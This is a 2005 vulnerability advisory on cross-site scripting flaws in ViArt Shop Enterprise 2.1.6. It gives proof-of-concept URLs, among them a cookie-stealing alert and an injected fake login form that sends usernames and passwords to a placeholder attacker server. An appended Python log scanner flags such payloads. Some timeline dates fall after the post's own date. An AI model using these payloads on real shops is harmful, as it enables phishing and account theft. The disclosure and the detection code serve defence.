ViArt Shop Enterprise multiple variable XSS

Friday, April 29, 2005
#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory: http://lostmon.blogspot.com/2005/04/viart-shop-enterprise-multiple.html
vendor informed: yes    exploit available: yes
OSVDB ID: 15951, 15952, 15953, 15954, 15955, 15956, 15957, 15958
Securitytracker: 1013853
Secunia: SA15181
BID: 13462
#########################################################

ViArt Shop contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not validate multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

##########
versions:
##########

ViArt Shop Enterprise v2.1.6 is affected.
It is also possible that prior versions are affected.

##########
Solution:
##########

Update to ViArt Shop version 2.1.8.

#########
timeline:
#########

discovered: 25 April 2005
vendor notified: 28 April 2005
vendor response: 18 October 2005
vendor fix: 5 May 2005
disclosure: 29 April 2005

########## Proof of concept ##############
############
basket.php
###########

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]

###########
forum.php
###########

http://[victim]/forum_new_thread.php

The form fields nickname, email, topic and message are vulnerable to XSS.

For the email field you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com

http://[victim]/forum_thread.php?thread_id=2

When replying to a post, the nickname and message fields are vulnerable to XSS.

All of these codes are executed when a user views the forum or when the admin
looks in the "admin panel" under "forum threads" in the forum menu.

###########
page.php
###########

http://[victim]/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http://[evil-server]/save.php%22%20method=%22post%22%3EUsername:%3Cinput%20aame=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=%22submit%22%20value=%22Login%22%3E%3C/form%3E

############
reviews.php
############

http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4

http://[victim]/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0

#################
products.php
#################

http://[victim]/product_details.php?item_id=4&category_id=0[XSS-CODE]

http://[victim]/products.php?category_id=13[XSS-CODE]

http://[victim]/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=

##################
news_view.php
##################

http://[victim]/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1

http://[victim]/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]
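
As an added defender-side example (not part of the advisory and not ViArt's code), a small Python access-log scanner that decodes the parameter shapes shown above, including the nested, URL-encoded query string carried in basket.php's rp parameter, and flags HTML-active values. The log format, client address and the three sample request lines are constructed here; only the payload shapes are taken from the PoC URLs.

```python
"""Access-log scan for the reflected-XSS parameter shapes in this advisory.
Constructed example, not ViArt's code: the sample lines below are made up
(common log format, client 203.0.113.5) and mirror the page.php and basket.php
PoCs; rp carries a nested URL-encoded query, so values are re-parsed recursively."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markup and handlers that have no business inside a shop's query parameters.
SUSPICIOUS = re.compile(r"<\s*/?\s*(script|iframe|img|form|input|svg)\b|javascript:|\bon\w+\s*=", re.I)

def leaf_values(query, depth=0, max_depth=3):
    """Yield (param_path, value) per parameter; a value shaped like path?query
    (as rp is) is descended into and its sub-parameters reported too."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        yield key, value
        if depth < max_depth and "?" in value:
            nested = value.split("?", 1)[1]
            for sub_key, sub_value in leaf_values(nested, depth + 1, max_depth):
                yield f"{key}->{sub_key}", sub_value

def scan_request(request_line):
    """Return [(script, param_path), ...] for one 'GET /path?q HTTP/1.x' line."""
    _method, target, _proto = request_line.split(" ", 2)
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    hits = []
    for path, value in leaf_values(parts.query):
        # A second decode catches payloads encoded once more for the nested level.
        if SUSPICIOUS.search(value) or SUSPICIOUS.search(unquote(value)):
            hits.append((script, path))
    return hits

def scan_log(lines):
    """Run scan_request over every request line found in the given log lines."""
    hits = []
    for line in lines:
        m = re.search(r'"((?:GET|POST) \S+ HTTP/\d\.\d)"', line)
        if m:
            hits.extend(scan_request(m.group(1)))
    return hits

SAMPLE_LOG = [  # constructed; payload shapes taken from the PoC URLs above
    '203.0.113.5 - - [29/Apr/2005:10:00:00 +0000] "GET /page.php?page=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [29/Apr/2005:10:00:01 +0000] "GET /page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.5 - - [29/Apr/2005:10:00:02 +0000] "GET /basket.php?rp=products.php%3Fcategory_id%3D0%253Cscript%253Ealert(1)%253C/script%253E%26search_string%3Dss HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for script, param in scan_log(SAMPLE_LOG):
        print(f"suspicious value in {script} parameter {param}")
```

A scanner that only decodes the top-level query once would see rp as harmless text; the recursive re-parse is what surfaces the category_id sub-parameter.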

################# end #########################

thnx to estrella for being my light
thnx to all the http://www.osvdb.org Team
thnx to icaro, who investigated with me.
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind.